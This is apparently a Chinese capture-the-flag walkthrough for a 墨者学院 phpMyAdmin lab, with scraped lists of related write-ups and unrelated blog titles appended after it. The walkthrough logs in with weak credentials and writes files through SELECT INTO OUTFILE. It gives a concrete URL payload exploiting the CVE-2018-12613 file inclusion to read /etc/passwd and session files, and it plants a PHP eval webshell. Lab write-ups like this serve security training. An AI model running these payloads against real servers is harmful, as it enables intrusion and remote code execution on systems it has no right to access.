首先拿到题目到点击访问

访问后使用弱口令进行登陆,如登陆失败开启隐私模式或者更换浏览器

账户密码:root   root

点击sql模块 对sql语句进行一个查询

首先查询sql写一句话的权限

我们可以看到他的值为空

secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。

show global VARIABLES like '%secure%'

继续查看mysql安装的绝对路径,可以发现他是安装在/var/lib/mysql/

show VARIABLES like 'datadir'

接下来确认一下mysql权限,可以看到这里是最高权限root

SELECT USER();

权限和绝对路径都有了之后可以直接写入一句话了,先试一下phpinfo

select '<?php phpinfo(); ?>' into outfile '/var/lib/mysql/test.php';

当写进去之后访问失败,想了半天才发现这是mysql的路径,不是网站的绝对路径

继续想办法搞到网站的绝对路径  根据题目可知是通过文件包含的方式写一个phpinfo,通过泄漏的绝对路径来shell,思路有了,直接干

首先确定下数据库版本,该版本为4.8.1。在根据数据库版本历史漏洞查询关于文件包含的编号是CVE-2018-12613

直接利用payload进行包含就行了

http://124.70.71.251:40917/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

先写入一个phpinfo进数据库

select '<?php phpinfo();?>';

再通过文件包含去调用phpinfo

首先获取session的值,在构造参数去访问phpinfo,获取绝对路径

http://124.70.71.251:45548/index.phpindex.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_[value]

有了绝对路径之后就可以写入webshell了,写入之后直接访问1.php

select "<?php @eval($_POST['cmd']) ?>" into outfile "/var/www/html/1.php";

使用管理工具登陆上去后到根下面直接去找key.txt  或者 find / -name key.txt

墨者学院-phpMyAdmin后台文件包含分析溯源相关推荐

  1. 墨者学院_phpMyAdmin后台文件包含分析溯源

    墨者学院_phpMyAdmin后台文件包含分析溯源 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的.基于Web的MySQL数据库管 ...

  2. 墨者靶场 phpMyAdmin后台文件包含分析溯源 (CVE-2018-12613)

    phpMyAdmin 第一种: 一.利用burp爆破出账号密码 二.尝试写马连入蚁剑 1.发现MySQL对导入导出没做任何限制 2.查询日志 3.利用日志写文件 4.访问写入的日志文件 6.尝试直接通 ...

  3. 墨者学院-登录密码重置漏洞分析溯源

    墨者学院-登录密码重置漏洞分析溯源 此题我是这么做出来的,首先用我已知的手机号进行重置密码操作,然后再开一个网页,填上嫌疑人的手机号,并发送短信,然后也给已知的手机号发送验证码 再给嫌疑人的复制过去, ...

  4. [ 墨者学院 ] 命令执行——Bash漏洞分析溯源

    0x00.题目描述: 背景介绍 安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命令执行漏洞. 实训目标 1.了解bash: 2.了解Bash远程命令 ...

  5. 墨者学院tomcat后台弱口令漏洞利用

    墨者学院tomcat后台弱口令漏洞利用 点击之后要我们登录,这里abc123:999user是base64解码之后的结果,可见要爆破base64编码,这里不写爆破过程了,下一期出一下爆破过程,这里直接 ...

  6. 墨者学院-二维码文件分析

    墨者学院-二维码文件分析 首先用手机微信扫, 什么都没扫出来,然后将二维码保存到本地, 再上传 然后用草料二维码在线扫描得到一串链接,将wd后面的base64进行解码,二次解码得到key 解码两次得到 ...

  7. 墨者靶场 初级:Bash漏洞分析溯源

    墨者靶场 初级:Bash漏洞分析溯源 题目 背景介绍 实训目标 解题方向 解题步骤 题目 背景介绍 安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命 ...

  8. 【墨者学院】WebShell文件上传漏洞分析溯源(第2题)

    替补选手的学习日记 靶场:墨者学院 题目:WebShell文件上传漏洞分析溯源(第2题) 1.打开是一个文件上传的提交框,正常上传一个txt文件看下返回结果. 2.看情况是限制了文件上传的后缀名,显示 ...

  9. 【墨者学院】WebShell文件上传漏洞分析溯源(第3题)

    替补选手的学习日记 靶场:墨者学院 题目:WebShell文件上传漏洞分析溯源(第3题) 1,打开页面依旧是熟悉的提交框,那么正常上传一个txt文件看下返回结果. 2.提示此文件不允许上传,应该是做了 ...

最新文章

  1. 第三周 9.13-9.19
  2. 用二分类神经网络估算多分类神经网络迭代次数的经验公式
  3. (c语言)和与积的运算第二篇
  4. C++11 作用域内枚举
  5. java反射api研究_深入研究Java 8中的可选类API
  6. 使用jquery时一些小技巧的总结
  7. 代理服务器列表(20100116)
  8. SpringBoot项目集成Mybatis Plus(二)代码生成器
  9. idea下以及git如何快速切换remote远端服务器
  10. 软件测试c语言笔试题目,软件测试笔试题库及答案.docx
  11. ERROR:STATUS_BROM_CMD_SEND_DA_FALL(0xC0060003)
  12. UML基础(八)--构件图
  13. 手势密码解锁微信小程序项目源码
  14. 定期存款的转存临界点计算公式
  15. 计算机算术3-整数加减法(前缀加法器)
  16. 前端实现在线预览文档(pdf、doc文件)
  17. 腾讯互娱旗下工作室一览
  18. android融云的几种参数,Android 集成融云
  19. LZY踢石头(优先队列)
  20. 设计师的AI自学之路:用图像识别玩忍术

热门文章

  1. 机器学习——凸优化基础知识
  2. 【回忆 总结】我的大学四年
  3. 3014C语言_运算符
  4. 【代码阅读】WarpGAN: Automatic Caricature Generation
  5. 基于asp.net的办公公文管理审批系统的设计与实现
  6. 安徽建筑大学计算机技术909数据结构
  7. Android 代码新增联系人至手机通讯录中
  8. 电脑快捷键大全(2)
  9. 过去66年的66项最佳发明(1964~1993)
  10. 汇编语言--键盘扫描及显示实验(含代码解释)